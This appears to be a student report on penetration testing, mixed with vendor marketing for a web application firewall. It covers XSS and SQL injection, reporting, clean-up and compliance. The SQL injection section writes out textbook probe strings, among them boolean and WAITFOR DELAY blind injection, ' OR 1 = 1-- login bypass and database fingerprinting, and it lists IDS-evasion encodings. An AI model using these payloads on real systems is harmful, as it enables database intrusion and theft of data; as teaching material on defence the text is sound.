Attackers are lured to XSS exploits because of how easy they are to perform, but they also know to follow the money. Attacking a web site through a cross-site scripting vulnerability can be quite profitable for an attacker who knows how to harness this type of exploit. Without proactive web application security in place to stop XSS attacks, you leave your site vulnerable to:

User accounts being stolen through session hijacking (stealing cookies) or through the theft of username and password combinations;
The ability for attackers to track your visitors' web browsing behavior, infringing on their privacy;
Abuse of credentials and trust;
Keystroke logging of your site's visitors;
Misuse of server and bandwidth resources;
The ability for attackers to exploit your visitors' browsers;
Data theft;
Web site defacement and vandalism;
Link injections; and
Content theft.

Web sites that have been exploited using XSS attacks have also been used to:

Probe the rest of the intranet for other vulnerabilities;
Launch Denial of Service attacks; and
Launch Brute Force attacks.

Preventing Cross-Site Scripting Attacks


With the dotDefender web application firewall you can avoid XSS attacks: dotDefender inspects your HTTP traffic and determines whether your web site suffers from cross-site scripting vulnerabilities or other attacks, stopping web applications from being exploited.

Architected as plug & play software, dotDefender provides optimal out-of-the-box protection against cross-site scripting, SQL Injection attacks, path traversal and many other web attack techniques. The reasons dotDefender offers such a comprehensive solution to your web application security needs are:

Easy installation on Apache and IIS servers;
Strong security against known and emerging hacking attacks;
Best-of-breed predefined security rules for instant protection;
An interface and API for managing multiple servers with ease; and
No additional hardware required, easily scaling with your business.

How does an attacker exploit a cross-site scripting vulnerability?


Before a web site can be compromised, an attacker needs to find applications that are vulnerable to XSS. Unfortunately, most web applications, both Free/Open Source Software and commercial software, are susceptible. Attackers simply perform a Google search for terms that are often found in the vulnerable software. Using search bots to automate this process means an attacker can find thousands of vulnerable web sites in minutes. Once a vulnerable web site is discovered, the attacker then examines the HTML to find where the exploit code can be injected.

Coding the exploit


After this has been determined, the attacker begins to code the exploit. There are three types of attacks that can be used: 1. Stored (persistent) attacks: injected malicious code is stored on a target server, such as in a bulletin board, a visitor log, or a comment field. When interacting with the target server, an end user inadvertently retrieves and executes the malicious code from the server. 2. Reflected attacks: the end user is tricked into clicking a malicious link or submitting a manipulated form. The injected code is sent to a vulnerable web server that directs the cross-site attack back to the user's browser. The browser then executes the malicious code, assuming it comes from a trusted server. 3. DOM-based attacks: the attack script manipulates and interrogates the DOM (Document Object Model) of the same page, enabling the attacker to execute malicious code in the victim's browser. After the code has been written, it is injected into the target site.

Reap the rewards


Now that the script has been injected into the vulnerable site, the attacker can begin to reap the rewards. If the intent of the XSS attack was to steal user authentication credentials, usernames and passwords are now collected. For attacks that center around keystroke logging, the attacker will begin to receive the logged results from the victims. If the intent was to inject spam links into a well-trusted site, then the attacker will begin to see increased activity on their own sites due to higher traffic and higher search engine rankings.

If the attack was successful, the attacker will often replicate it on other sites to increase the potential reward.

The Need to Avoid Cross-Site Scripting Attacks


Cross-site scripting costs businesses not only in stolen data, but also in harm to their reputation. Owners who work hard to establish a trusted site that delivers content, services, or products often find themselves hurt when loyal visitors lose trust in them after an attack. Visitors whose data is stolen, or who find their computers infected as the result of an innocent visit to your web site, are hesitant to return, even if assurances are made that the site is now clean. Even once a vulnerable site is fixed, sites that contained malicious code from an XSS exploit are usually flagged by Google and other search engines as a result. The time and effort spent restoring a solid reputation with the search engines is an added cost that most web site owners never figure on. The threat posed by cross-site scripting attacks is not solitary: combined with other vulnerabilities like SQL injection, path traversal, denial of service attacks, and buffer overflows, the need for web site owners and administrators to be vigilant is not only important but overwhelming.

Protect Yourself from Cross-Site Scripting Attacks


dotDefender's unique security approach eliminates the need to learn the specific threats that exist on each web application. The software focuses on analyzing each request and the impact it has on the application. Effective web application security is based on three powerful web application security engines: Pattern Recognition, Session Protection, and a Signature Knowledgebase. The Pattern Recognition engine employed by dotDefender protects against malicious behavior such as SQL injection and cross-site scripting. The patterns are regular-expression-based and designed to efficiently and accurately identify a wide array of application-level attack methods; as a result, dotDefender is characterized by an extremely low false positive rate. What sets dotDefender apart is that it offers comprehensive protection against cross-site scripting and other attacks while being one of the easiest solutions to use. In just 10 clicks, a web administrator with no security training can have dotDefender up and running. Its predefined rule set offers out-of-the-box protection that can be easily managed through a browser-based interface, with virtually no impact on your server's or web site's performance.

Prevent SQL Injection Attacks


What makes the threat of SQL injection attacks so dangerous is the ease with which they can be launched and the number of web sites that are vulnerable to them. Attackers often use large botnets to systematically seek out vulnerable web sites, with little work being done on their part. Pair this with the fact that the number of sites vulnerable to this type of attack grows each year, and it is clear why it remains at the top of the most critical vulnerabilities.

Risks Associated with SQL Injection


Even with the ease with which an automated SQL injection attack can be carried out, if attackers stood to gain nothing, this threat would soon disappear. Unfortunately, those who successfully compromise vulnerable web sites find that this vulnerability can be quite profitable, as it gives the attacker access to the database, so information can be sold or data can be deleted. More advanced techniques can also be used to give the attacker unrestricted access to the system through a backdoor. SQL injection can also be used in tandem with other exploits, such as cross-site scripting, to manipulate how data is displayed to a web site's visitors. Not preventing SQL injection attacks leaves your business at great risk of:

Changes to or deletion of highly sensitive business information;
Theft of customer information such as social security numbers, addresses, and credit card numbers;
Financial losses;
Brand damage;
Theft of intellectual property; and
Legal liability and fines.

How does an attacker compromise your SQL server?


Before a web site can be compromised, an attacker needs to find applications that are vulnerable to SQL injection, using queries to learn the SQL application's methods and its response mechanisms. The attacker has two ways to identify SQL injection vulnerabilities: 1. Error messages: the attacker constructs the correct SQL syntax based on error messages propagated from the SQL server via the front-end web application. Using the errors received, the hacker learns the internal SQL database structure and how to attack it by injecting SQL queries via the web application's parameters. 2. Blindfolded (blind) injection: this technique is utilized by hackers in situations where no error messages or response content are returned from the database. In these cases, the attacker lacks the ability to learn the back-end SQL queries in order to balance the injected SQL, and in the absence of database content output within the web application, the attacker is also challenged with finding a new way of retrieving the data.
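As a hedged illustration of blind techniques (the probe strings are generic examples, not tied to a specific application): the attacker submits paired inputs whose only difference is a predicate that is always true or always false, and compares the responses, or falls back on a timing primitive when even that signal is absent:

' AND 1=1 --                    (page renders normally if the input is injectable)
' AND 1=2 --                    (page changes or comes back empty if injectable)
'; WAITFOR DELAY '0:0:5' --     (MS SQL Server: a five-second stall confirms execution)

A consistent behavioral difference between the true and false probes, or a measurable delay, tells the attacker the input is injectable even though no data or error text is ever shown.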

Identifying the database


When the attacker knows how each database reacts, he or she can identify the database type and the server that is running it. There are several techniques the attacker uses to identify database objects in a SQL statement: 1. using a concatenation string, e.g., select f1+f2 from t1; 2. using a semicolon or a dollar sign ($).
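The concatenation probe works because string concatenation syntax differs between database engines; as a hedged illustration:

select 'a' + 'b'        -- succeeds on MS SQL Server
select 'a' || 'b'       -- succeeds on Oracle and PostgreSQL
select CONCAT('a','b')  -- succeeds on MySQL

Whichever variant executes without error tells the attacker which engine, and therefore which attack syntax, to use next.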

Compromising the SQL server


Once the attacker has all the information, he can build the exploit code. Some techniques used to execute SQL injection attacks are:

Terminating queries using quotes, double-quotes, and SQL comments;
Using stored procedures;
Database manipulation commands such as TRUNCATE and DROP;
Using CASE WHEN and EXEC to run nested queries;
Utilizing SQL injection to create buffer overflow attacks within the database server;
Delivering SQL queries via XML and Web Services;
Blindfolded SQL injection techniques:
o Blindfolded injection using Boolean queries and WAITFOR DELAY;
o Comparison queries using commands such as BETWEEN, LIKE, and ISNULL;
IDS-signature-evasive SQL injection techniques:
o Using CONVERT and CAST commands to mask the attack payload;
o Using null bytes to break the signature pattern;
o Using HEX encoding mixtures;
o Using SQL CHAR() to represent ASCII values as numbers.

For example, the attacker decides to go with a basic attack using: 1 = 1--. What happens when this is entered into an input box is that the server recognizes 1 = 1 as a true statement. Since -- is used for commenting, everything after it is ignored, making it possible for the attacker to gain access to the database. You can see precisely how this attack works on our SQL injection example page.
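To make the mechanics concrete (the login query shown is a hypothetical example, not taken from a specific application): if a login form builds

SELECT * FROM users WHERE username = 'admin' AND password = '<input>'

then entering ' OR 1 = 1-- as the password yields

SELECT * FROM users WHERE username = 'admin' AND password = '' OR 1 = 1--'

The OR 1 = 1 makes the WHERE clause true for every row and the -- comments out the trailing quote, so the query returns rows and the login check passes without a valid password.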

The Need to Avoid SQL Injection Attacks


SQL injection techniques have been around for over 10 years now, but recent years have seen a dramatic increase in both the number of attacks and the extent of the damage caused by them. In fact, a sweep of attacks in the second quarter of 2008 alone resulted in over 500,000 exploited web pages that were compromised to deliver password-stealing malware to users' computers. In more recent studies, security firms report attempted attacks reaching totals of 450,000 per day. The tragedy is that these threats can be mitigated, or even prevented, with the proper tools and knowledge.

SQL (Structured Query Language) provides an interface to facilitate access to and interaction with a database, which usually stores data in tables and procedures. SQL injection is a security exploit method in which the attacker identifies vulnerabilities, obtains database access, and aims to penetrate the back-end database to manipulate, steal, or modify information, exploiting the web application by injecting malicious queries. Almost all SQL databases and programming languages are potentially vulnerable, and over 60% of websites turn out to be vulnerable to SQL injection.

The threat posed by SQL injection attacks is not solitary. Combined with other vulnerabilities like cross-site scripting, path traversal, denial of service attacks, and buffer overflows, the need for web site owners and administrators to be vigilant is not only important but overwhelming.

CHAPTER 4 Results and Analysis

4.1 Analysis and Results



After conducting all the tasks above, the next task is to generate a report for the organization. The report should start with an overview of the penetration testing process performed. This should be followed by an analysis of, and commentary on, the critical vulnerabilities that exist in the network or systems. Vital vulnerabilities are addressed first to highlight them to the organization; less vital vulnerabilities should then be highlighted. Separating the vital vulnerabilities from the less vital ones helps the organization in decision making: for example, an organization might accept the risk incurred from the less vital vulnerabilities and only fix the more vital ones. The other contents of the report should be as follows:

A summary of any successful penetration scenarios;
A detailed listing of all information gathered during penetration testing;
A detailed listing of all vulnerabilities found;
A description of all vulnerabilities found; and
Suggestions and techniques to resolve the vulnerabilities found.

Cleaning Up
The cleaning-up process is done to clear any mess that has been made as a result of the penetration test. A detailed and exact list of all actions performed during the penetration test must be kept; this is vital so that any cleaning up of the system can be done. The cleaning up of compromised hosts must be done securely and without affecting the organization's normal operations. The cleaning-up process should be verified by the organization's staff to ensure that it has been done successfully. Bad practices and improperly documented actions during a penetration test will result in the cleaning-up process being left as a backup-and-restore job for the organization, affecting normal operations and taking up its IT resources. A good example of a clean-up task is the removal of user accounts that were created externally on a system as part of the penetration test. It is always the penetration tester's responsibility to inform the organization about the changes that exist in the system as a result of the penetration test, and also to clean up this mess.

Limitations of Penetration Testing


There are many security problems that penetration tests will not be able to identify. Penetration tests are generally carried out as "black box" exercises, where the penetration tester does not have complete information about the system being tested, so a test may not identify a vulnerability that is obvious to anyone with access to internal information about the machine. A penetration test can only identify those problems that it is designed to look for: if a service is not tested, then there will be no information about its security or insecurity. A penetration test is also unlikely to provide information about new vulnerabilities, especially those discovered after the test is carried out.

Even if the penetration team did not manage to break into the organization, this does not mean that the organization is secure. Penetration testing is not the best way to find all vulnerabilities: vulnerability assessments that include careful diagnostic reviews of all servers and network devices will identify more issues faster than a "black box" penetration test. Penetration tests are conducted in a limited time period, which means that each test is a "snapshot" of a system or network's security; as such, testing is limited to known vulnerabilities and the current configuration of the network. Just because a penetration test was unsuccessful today does not mean a new weakness will not be posted on Bugtraq and exploited in the near future. Likewise, if the testing team did not discover a vulnerability in the organization's systems, it does not mean that hackers or intruders will not.

As business has transformed over the years to a more service-oriented environment, a significant increase in trust has been placed in outside organizations to manage business processes and corporate data. Do you truly know how secure your third-party service providers' networks and web applications are? What about your own network or web applications? Data breaches are occurring at an all-time high. Network security's increased visibility at the C level is also helping IT departments to increase their budgets and move their requests to the top of every corporation's annual budget. The need for accessible, on-demand data used in real-time decision making, together with an increased focus on business efficiencies, has resulted in vital and confidential data being accessible, stored, and transferred electronically across corporate networks and the internet. Attempted breaches occur every day through the use of automated bots and targeted attacks, but without proper testing, how do you know whether your business, or a third-party service provider of yours, is susceptible to attack?

Properly Monitor Network and Application Security


There are a number of common failures that a surprisingly high number of IT departments fall victim to, which leave their organizations at risk of intrusion:

Delays in patching security flaws in operating systems and software;
Use of insecure access protocols;
Lapses in licensing for antivirus, IDS, IPS, and other vulnerability identification and prevention tools;
Weak passwords for firewalls and other exposed services;
A loose software management policy;
Weak secure-coding guidelines and QA review processes; and
Lapses in IT management's adherence to security controls and protocols.

All of these issues are preventable by ensuring that a proper security maintenance program, with sufficient resources dedicated to its execution, is in place. A regularly scheduled external and/or internal vulnerability assessment can serve to validate the operation of current security practices and identify new issues that may have been introduced as a result of an upgrade or system change.

Regulatory Compliance
Software as a Service (SaaS) offerings, application service providers, third-party colocation and hosting facilities, and especially corporate networks have become prime targets for hackers, with the number of incidents increasing yearly, as they are treasure troves of the confidential business data targeted by criminals. This has elevated the importance of IT security in the enterprise and within various compliance and regulatory frameworks.

Recognized frameworks include, at minimum, requirements that a regular vulnerability assessment of the production network and/or web application be performed. Depending upon your environment, the following frameworks potentially require these assessments:

Sarbanes-Oxley (SOX);
Statements on Standards for Attestation Engagements 16 (SSAE 16 / SOC 1);
Service Organization Controls (SOC) 2 / 3;
Payment Card Industry Data Security Standard (PCI DSS);
Health Insurance Portability and Accountability Act (HIPAA);
Gramm-Leach-Bliley Act (GLBA); and
Federal Information System Controls Audit Manual (FISCAM).

Commonly Identified Risks


Inappropriate SSL certificate (expired, not properly configured, self-signed, etc.);
Unknown or unnecessarily open shares;
Dormant user accounts that have not expired;
Unnecessary open ports;
Rogue devices connected to your systems;
Dangerous script configurations;
Servers allowing use of dangerous protocols;
Incorrect permissions on important system files;
Running of unnecessary, potentially dangerous services;
Default passwords in use; and
Unpatched services / applications.

Cyber Security Risk Management Preparedness


The US-CERT (Computer Emergency Readiness Team) recommends that CEOs and business owners ask themselves the following questions regarding their readiness to defend against and recover from a cyber attack:

How Is Our Executive Leadership Informed About the Current Level and Business Impact of Cyber Risks to Our Company?
What Is the Current Level and Business Impact of Cyber Risks to Our Company?
What Is Our Plan to Address Identified Risks?
How Does Our Cyber Security Program Apply Industry Standards and Best Practices?
How Many and What Types of Cyber Incidents Do We Detect in a Normal Week? What Is the Threshold for Notifying Our Executive Leadership?
How Comprehensive Is Our Cyber Incident Response Plan? How Often Is It Tested?

Penetration testing is an important part of a company's defence against cyber attacks. Penetration testing may also be referred to as ethical hacking: it is a means of checking that systems, buildings, and people are secure by simulating criminal attacks. Penetration testing should reflect a measured approach to risk. Think of things from a criminal's point of view: how much time, effort, and money would criminals invest to gain access to your assets? How much time, effort, and money are YOU willing to invest to ensure they can't?

Successful cyber attacks result in brand damage, financial loss, and recovery costs. It is important to ensure your organization is, and remains, resilient to such attacks.

It is helpful to take an asset-centric point of view and focus on defending the assets or data that matter most to your company. Pentesters usually take the following approach:

Scoping - where are your assets, what are they, and who can access them?
Gap Analysis - what are the strengths and weaknesses in your organisation?
Risk Assessment - how likely are your gaps to become targets?
Penetration Test Scoping - what test plan, when executed, will give your company assurance that systems are secure?
Remediation - following a test, how are issues addressed?
Improvement - what policies and processes can be fixed so issues do not recur?

A good penetration testing firm will be able to guide you through this and ensure you select the right balance of cost, risk, and security. There is nothing worse than undergoing year-on-year penetration testing, only to find the same issues. Pen testers want to see their clients develop and improve their security postures, not remain targets.

Physical Penetration Testing - why do we need to do it?


In the current climate of business insecurity, there are significant risks for businesses that suffer security breaches, which may cause significant loss of, or damage to:

Physical assets;
People;
Brand reputation; and
Profits.

It is not difficult to see a business being brought to its knees by what appears to be an innocuous theft or other lapse in security. It is crucial that businesses put good holistic security measures in place, including physical, personnel, and information security measures. However, for these measures to be effective, they should be regularly tested to ensure they are appropriate and proportionate to the threat. Independent commercial physical penetration tests are an ideal means of checking that the security measures work as intended.

Reputational Analysis
The most secure infrastructures in the world are still subject to the threat of deliberate or negligent human activity, and whilst human error can never be truly eliminated, your resilience against intelligence-gathering activities can be measured through a social engineering assessment, which typically includes: a. using telephony systems to gain potentially sensitive information from employees; b. using social media sites to gain employee trust; and c. posing as a customer, senior manager, or trusted third party to glean information. Furthermore, a degree of sensitive information may also be available on publicly accessible websites (a very high-level example being Google), attacks may be being planned against you via IRC channels, and employees may be breaching confidentiality clauses by knowingly or unknowingly releasing sensitive information about your company.

Source code review is an essential part of best-practice software security and of compliance regulations such as PCI DSS and PA DSS. It also helps to eliminate serious software flaws that might lead to instability or affect the integrity of data. A review should provide both static and dynamic testing of source code, to ensure applications offer a high level of protection for confidential data and meet ever-stricter compliance requirements, and to verify that your code complies with the OWASP Top 10 and is not prone to:

Unvalidated input;
Broken access control (for example, malicious use of user IDs);
Broken authentication and session management (use of account credentials and session cookies);
Cross-site scripting (XSS) attacks;
Buffer overflows;
Injection flaws (for example, structured query language (SQL) injection);
Improper error handling;
Insecure storage;
Denial of service; and
Insecure configuration management.

A source code review should: a) eliminate the risk of SQL injection, XSS, and CSRF style attacks; b) analyse millions of lines of code across multiple modules; c) interpret security flaws in a wide range of languages, including C and its derivatives, ASP, ASP.NET, Visual Basic, VB.NET, C#, Java, Perl, Python, PHP, and Delphi; d) pinpoint vulnerabilities and provide precise, detailed remediation advice for rapid fixes; e) identify design areas and recommend best practice; and f) advise on countermeasures such as Web Application Firewalls.

SDLC Assessment and Security Training for Developers


Pentesters should advise on industry standards and best practices to help you build security into each phase of the lifecycle, including:

Secure Software Concepts - security implications in software development and for software supply chain integrity;
Secure Software Requirements - capturing security requirements in the requirements-gathering phase;
Secure Software Design - translating security requirements into application design elements;
Secure Software Implementation/Coding - developing secure code and exploit mitigation, with unit testing for security functionality and resiliency to attack;
Secure Software Testing - testing for security functionality and resiliency to attack;
Software Acceptance - security implications in the software acceptance phase; and
Software Deployment, Operations, Maintenance and Disposal - security issues around steady-state operations and management of software.

The review is aimed at all software lifecycle stakeholders, and provides:


A holistic approach to software security needs;
Advice regarding designing, developing, and deploying secure software;
Knowledge of the latest software security technologies;
Assurance of compliance with regulations; and
Compliance with your set of policies and procedures.

Confidentiality, integrity, availability, authentication, authorization, and auditing - the core tenets of security - must become requirements in your Software Development Lifecycle. Without this level of commitment, information is placed at risk. Incorporating security early, and maintaining it throughout all the different phases of the Software Development Lifecycle, has proven to be 30-100 times less expensive, and incalculably more effective, than the release-and-patch methodology frequently used today.

CHAPTER 5 CONCLUSION

5.1 Conclusion of Analysis for Penetration Testing


Penetration testing is a comprehensive method to identify the vulnerabilities in a system. It offers benefits such as prevention of financial loss; compliance with industry regulators, customers, and shareholders; preservation of corporate image; and proactive elimination of identified risks. Testers can choose from black box, white box, and gray box testing, depending on the amount of information available to them. Testers can also choose between internal and external testing, depending on the specific objectives to be achieved. There are three types of penetration testing: network, application, and social engineering. This paper describes a three-phase methodology consisting of a test preparation phase, a test phase, and a test analysis phase. The test phase is done in three steps: information gathering, vulnerability analysis, and vulnerability exploitation, and it can be carried out manually or using automated tools. This penetration testing process was illustrated on web applications. Testers should follow a comprehensive format to present the test results. One of the most important parts of the test analysis phase is the preparation of remediation guidance, which includes all necessary corrective measures for the identified vulnerabilities. The final report needs to have enough detail and substance to allow those doing remediation to simulate and follow the attack pattern and the respective findings.

One of the crucial factors in the success of a pen-test is the underlying methodology. Lack of a formal methodology means no consistency, and the client would not want to pay for, and watch, testers working cluelessly. While a penetration tester's skills need to be specialized for the job, the approach should not be: a formal methodology should provide a disciplined framework for conducting a complete and accurate penetration test, but it need not be restrictive - it should allow the tester to fully explore his or her intuitions. A penetration test is also of little use without a well-implemented security policy. In order for the testing service to bring conformity between penetration testers and clients of the penetration test, a penetration testing policy was suggested in this research. Methodology makes the testing service more effective, while policy reduces financial and confidentiality disputes between the two parties of the testing service.

Penetration testing is essential given the context of high operational risk in the financial services industry. Web-based and internal applications should be fully tested to ensure they do not provide an avenue of entry for attackers. Vulnerability management should be considered a priority given the sophisticated malware targeting client PCs inside the organization. Wireless vulnerabilities also add to the attack surface that can be exploited. Penetration testing is the only legitimate means to identify the residual risk that remains after code has been tested and operational and other threats have been minimized. To make the most of penetration testing it is necessary to prioritize the effort: the penetration test should be scoped properly and should take advantage of the knowledge that the client organization has regarding exposures within its enterprise, and this information should be combined with the experience and insight of the penetration testing company. As stated initially, the goal of penetration testing is to compromise a target system and ultimately steal information.
Penetration testing is focused on finding security vulnerabilities in a target environment that could let an attacker penetrate the network or computer systems. A collaborative approach is recommended, whereby the financial services organization and the penetration testing organization work together to more efficiently identify which exploits can be leveraged to steal information.

Organizations that bear network security risk should engage in an ongoing vulnerability management program. Such a program includes ongoing vulnerability assessments, ongoing vulnerability remediation, and risk measurements. When the vulnerability management program's measurements provide a given level of confidence, it is then time to test the security assertions and perform a penetration test. An organization should only engage in a penetration test once it is confident that what it wants tested is secure; if your organization does not have a vulnerability management program, there is no sense in taking the test. Before a student takes a test, the student must prepare. The great Master Kan once said to his student: "When you can take the pebble from my hand, it will be time for you to leave." Similarly, when the vulnerability management program's measurements indicate that one is secure, it is time for the test.
